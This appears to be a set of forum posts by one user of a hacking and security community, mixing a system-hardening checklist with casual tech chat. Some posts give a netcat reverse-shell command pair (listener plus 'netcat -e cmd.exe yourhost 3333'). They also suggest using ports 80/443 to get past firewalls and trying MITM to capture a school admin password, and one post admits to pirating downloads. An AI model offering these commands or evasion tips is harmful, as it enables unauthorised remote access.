Infiltrator

Or buy a computer screen that has remote control capabilities.

Yep I still remember that, used to be a really cool way for exchanging short text messages to everyone in the school. But then they changed they whole system to windows nt.

What do you mean, WASSSS the best. Comodo is still the best firewall out there. It has features that surpasses all other firewalls currently available.

Try this utility http://www.nirsoft.net/utils/nircmd.html The command is nircmd.exe monitor off This will only allow you to turn off the monitor locally not remotely. However you could set up a persistent netcat reverse shell, where you could remotely turn on and off the monitor.

Back in my High school, the network was operated on Novell. And one of my college managed to capture the local administrator password using MITM attack. May be you should try that. I would recommend doing some reading on what MITM is compromised of.

Don't want to rain on your parade, but if you do a search in Google for something like. Top 10 hacking tools, you will be able to find what you are looking for. See I just did a search and found the following http://www.darknet.org.uk/2006/04/top-15-s...ools-utilities/ http://sectools.org/

That's kind of interesting, cause when I created a reverse shell with netcat on my VMs. I was able to get a reverse shell, even with the firewall turned on. May be you should try using the TCP ports mentioned (80, 443)

Would like to add a few more things. But generally that's pretty much how I would secure my system. Well done, you got 5 starts. Router: 1) Enable WPA2 (WPA if not supported) and use a strong passphrase. If possible also use MAC address filtering. 2) Make sure your router has its firewall enabled and there are no open ports unless you enabled them 3) Make sure the router has a non-default administrative access password 4) Make sure it is using the latest firmware. 5) Use HTTPS instead of HTTP to secure the connection when doing administrative tasks. Software: 1) Ensure you’re using the latest version of your software (specifically quicktime, itunes, java and your web browser, but everything else as well) 2) Replace Adobe Reader with Foxit Reader or another alternative 3) If you don’t need it then for gods sakes don’t install Flash! 4) IMO, you should use Google Chrome for surfing the web, as it has a secure sandbox feature which makes it safer than other browsers 5) Use VPN software to stop wifi packet sniffing 6) Encrypt sensitive data (especially if moving it around on flash drives)(maybe full disk encryption) 7) Use web filtering software to prevent end users surfing porn, torrents, etc (I would personally use something like Squid or openDNS for web filtering, since some standalone software could be easy bypassed) 8) Disable macro’s in MS Office 9) Use VMs if you have to open/view untrusted web sites or attachments. Operating System Security: 1) Use strong and un-guessable passwords (long, upper/lower case, numbers, symbols, random subject data) 2) If the end user doesn’t need it, disable the support for USB flash drives (maybe possible through the BIOS, 3) Do not let windows manage the you logon password, use other secure means for authenticating. Programs such as pwdump could be used to extract the hashes. otherwise methods are discussed here or on google) 3) Disable autorun for CDs/USBs 4) Install antivirus/antispyware software, keep it up to date and scan frequently 5) Make sure you have all the latest security updates and service packs (for Windows and Office) 6) Make sure the default administrator account has a password and its hard to guess 7) Use group policy to lock out things such as task manager, regedit, services, mmc, internet explorer accessing files/folders, etc 8) Enable the windows firewall or install a Comodo Personal Firewall

I guess its all part of learning, at some point in time we all gonna have to learn something new. I got something for you danielbrthwt, check out this link. http://backtrack.offensive-security.com/in...ur_Network_Card

Wouldn't that be a lot more secure to just encrypt the data with RSA instead of blowfish, since the RSA keys can be a lot more lengthy than the blowfish keys. But I do I understand where you are coming from. It was just my observation.

Hi C0R, In order to create a reverse shell with NetCat you will need to do the following: On your host, you have to listen for an incoming connection (thanks to -v, you'll get a quick note as soon as the shell connects): netcat -v -l -p 3333 On the remote host, the following command has to be executed in order to establish a connection to your host: netcat -e cmd.exe yourhost 3333 Try the above, if doesn't work let me know. Regards, Infiltrator

Thanks for correcting that up, but I did know that it would take more than a port scanner to reveal the real services running behind those ports.

I just got transferred from my 2 years help desk job to an engineering position. So I am gonna love it.

Me dangerous criminal NOOOOO, nothing that I am going is illegal. To be honest, I changed my mind towards downloading movies, I buy them instead of downloading them. But for musics and porn, I always download them.

I do that all the time, I download movie and especially porn.

Changing the default ports doesn't only minimize the scan attacks but it also gives you a bit more protection. Since the attacker will have to guess what services are running behind those ports.

Did you change the SSH default ports to one of the school's opened ports (80, 443).

I just checked my VM configuration and its set to NAT instead of bridge. I do not have any ports opened on my firewall, except for upnp. And I am able to upload. The VM is on the same network segment and it is set to obtain an ip address dynamically.

I have been using CerberusFTP for quite a while and I am really happy with it. It also supports encrypted connection, if you are paranoid about someone eavesdropping into your connection. Very easy to set up and to configure. And if you have to access files from over the web, just do what MrProtocol suggested, open forward ports accordingly.

ntpassword offline very good utility for resetting passwords. Had a college who forgot her vista password and NTpassword offline did a great job.

Damn that's challenging.

I play a lot C&C and I often have to play against multiple enemies, so I'd say multiple player is a winner, it does make the job easier for you in the end. If you want to win in a game and you have the right people like gcninja mentioned than you are in business.

From the VMs can you ping your gateway or google.com at all. If not try setting your VMs to obtain an ip address dynamically. That's how my VMs are configured and I am also able to upload and download torrents without any issues.

I've searched the whole internet, looking for ways to decrypt the text but its sill no luck. Man I spend a whole good time trying to figure it out and no success.

Any security camera connected to a computer network is never secured, no matter if it is connected via WIFI or Wired connection. If someone can manage to break into your system then they will be compromised. There are certainly ways to improve its security, hiring a profession and let him do the dirty work for you. Or ensure the cameras have its own independent network system and no connectivity from the outside. But you are right, they can never be secured enough from preying eyes.